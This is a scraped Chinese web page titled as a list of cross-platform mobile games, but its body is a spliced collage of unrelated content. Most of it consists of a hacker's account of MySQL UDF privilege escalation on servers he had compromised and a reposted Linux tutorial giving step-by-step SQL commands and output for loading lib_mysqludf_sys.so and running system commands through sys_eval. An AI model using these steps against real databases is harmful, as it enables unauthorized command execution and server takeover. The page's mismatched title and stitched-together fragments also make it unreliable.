ios和ios安卓互通游戏数据互通的游戏都有哪些

来源:蜘蛛抓取(WebSpider) 时间:2017-11-09 08:16 标签: ios和安卓互通的游戏
当前位置:
微信扫一扫分享到朋友圈
由于以前都是拿拿shell,根本没有想过提权的事情,所以我提权的实战实在是太少了,最近抓了点shell于是想练练提权,但是万事开头难啊,今天udf提权最终以失败告终。但是还是涨了点经验,在此一起分享下。0x1:第一步,就是要想办法,弄到mysql的账户信息.因为udf提权是对数据库进行读写文件以及创建一个cmdshell函数来进行的,这个cmdshell就是 我们最终用来执行cmd命令的一个函数(但是不知道有没有试过直接sql注入的时候提权)。它结合udf.dll就能执行cmd。例如:select cmdshell('ipconfig');而找数据库信息的最好办法就是找config之类的配置文件,当然也有些奇葩的,比如会出现在桌面上的某个txt文件上。0x2:在上一步的基础上,就是要导出udf.dll了,这个有点坑,如果你是php的站的话就直接利用udf.php之类的工具吧。但是jsp怎么办?没有工具,于是就只能够找审计牛@AAA了,其实也非常简单,就是先创建一个表,然后把udf.dll的内容先以加密的形式写进去,再读到指定文件中去。具体过程如下:1.create table udftmp (c blob);//建表2.insert into udftmp values(convert(0x4D5A9000...加密的udf.dll,CHAR));3.select c from udftmp dumpfile '具体的要导入的udf.dll文件的路径' ;在上面那一步好了之后,就可以创建cmdshell函数了;create function cmdshell returns string soname 'udf.dll';然后就可以执行之前的cmdshell,当然这里不同的版本,就得有不同的写入udf.dll的写入路径,而且还会有版本限制,所以最好先确定好版本之后再对症下药,至于具体的操作,有更详细的帖子,你们要用的时候自己搜。而我写这个贴的意义就是讲一下基本的原理,以及说一下飞php的站点怎么提,这两个都是其他博客比较欠缺的。忘了说了,我这次的mysql是5.6 & 5.1,直接放弃了。
分享给好友
分享到微信朋友圈:
第一步 打开微信底部扫一扫
第二步 扫下面的文章二维码
第三步 右上角点击转发
相关文章Relevant
现如今,飞机以舒适、方便与节省时间等原因成为出行首选的交通方式之一.可你是否知道,为何不能喝飞机上的冲泡茶饮,又为何在...
【最费脑力的14部电影】《盗梦空间》、《记忆裂痕》、《生死停留》、《死亡幻觉》、《禁闭岛》、《穆赫兰道》、《蝴蝶效应》、...
■ 点击上面蓝字一键关注 ▲QIBU生活微刊建议在WIFI下观看,土豪请随意~~1、每一次接吻 会消耗体内至少12个卡路里科学家指出:...
因女儿未出世便患肿瘤,柴静离职后首发雾霾调查.雾霾是什么?它从哪儿来?我们怎么办?看完这些,才知道雾霾的真相.震撼!震...
我是主播 贝妮~(微信号:Voaoao)每天提供最热门、最火爆、最精彩的视频!口味有点儿重喔~笑死!笑死!笑死!如果觉得这些还...
感知CG,感触创意,感受艺术,感悟心灵 在CG世界的一期中我们展示了 Vince Low的一部分作品,今天再次翻看CG网站时发现他的...Linux利用UDF库实现Mysql提权
投稿:hebedich
字体:[ ] 类型:转载 时间:
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
os:linux(bt5)
database:mysql
通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。
&在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;
过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令
1,得到插件库路径
mysql& show variables like "%plugin%";
+---------------+-----------------------+
| Variable_name | Value
+---------------+-----------------------+
| plugin_dir
| /usr/lib/mysql/plugin |
+---------------+-----------------------+
1 row in set (0.00 sec)
2,找对应操作系统的udf库文件
因为自己测试,看了下自己系统的版本,64位
root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST
对于udf文件,在sqlmap工具中自带就有,只要找对应操作系统的版本即可
root@bt:/pentest/database/sqlmap/udf/mysql# ls
linux windows
root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls
root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls
lib_mysqludf_sys.so
3,利用udf库文件加载函数并执行命令
首先要得到udf库文件的十六进制格式,可在本地通过
mysql& select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';
Query OK, 1 row affected (0.04 sec)
因为我测试时,使用自带账户,账户名mysql,并不是root,所以插件目录不可写,而实际中,一般udf提权都是用root权限启动的mysql程序,故,不存在目录权限不足,不能访问的情况。为了继续,修改目录权限
:~# chmod 777 /usr/lib/mysql/plugin
数据库中写入udf库到mysql库目录:
mysql& select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.04 sec)
查看下这个udf库所支持的函数
root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so
w _Jv_RegisterClasses
1788 A __bss_start
w __cxa_finalize
w __gmon_start__
1788 A _edata
1798 A _end
1178 T _fini
0ba0 T _init
101a T lib_mysqludf_sys_info
0da4 T lib_mysqludf_sys_info_deinit
1047 T lib_mysqludf_sys_info_init
0dac T sys_bineval
0dab T sys_bineval_deinit
0da8 T sys_bineval_init
0e46 T sys_eval
0da7 T sys_eval_deinit
0f2e T sys_eval_init
1066 T sys_exec
0da6 T sys_exec_deinit
0f57 T sys_exec_init
10f7 T sys_get
0da5 T sys_get_deinit
0fea T sys_get_init
107a T sys_set
10e8 T sys_set_deinit
0f80 T sys_set_init
最后,加载函数并执行:
mysql& create function sys_eval returns string soname "mysqludf.so";
Query OK, 0 rows affected (0.14 sec)
mysql& select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
+--------------------+
1 row in set (0.04 sec)
mysql& select * from mysql.
+----------+-----+-------------+----------+
| ret | dl
+----------+-----+-------------+----------+
| sys_eval |
0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set
您可能感兴趣的文章:
大家感兴趣的内容
12345678910
最近更新的内容
常用在线小工具留下脚印,证明你来过。 由于近期工作比较忙,导致博客更新速度奇慢,希望大家不要介意,我会抽时间更新一些文章,希望大家喜欢。
本站文章部分为网络收集整理,若侵犯了您的版权请告知!
成功因为坚持,失败因为放弃!
日志总数:444 篇评论总数:1706 个标签数量:506 个链接总数:33 个建站日期:运行天数:2959最后更新:帐号密码
支持博客发展,爷来打赏你!(微信)广而告之
最新文章随机文章热门文章
留言光荣榜最新评论& & & & 写在前面:本文旨在通过透彻分析Linux下MySQL的udf提权来提高大家的知识水平,以对这种类型的提权进行更好的防范,学了不要干违法的事情,否则后果自负。& & Linux操作系统自从诞生后,其高效的处理能力和卓越的稳定性受到广……
声明:该文章系网友上传分享,此内容仅代表网友个人经验或观点,不代表本网站立场和观点;若未进行原创声明,则表明该文章系转载自互联网;若该文章内容涉嫌侵权,请及时向
论文写作技巧
上一篇:下一篇:
相关经验教程

我要回帖

更多关于 ios和安卓互通的游戏 的文章

 

随机推荐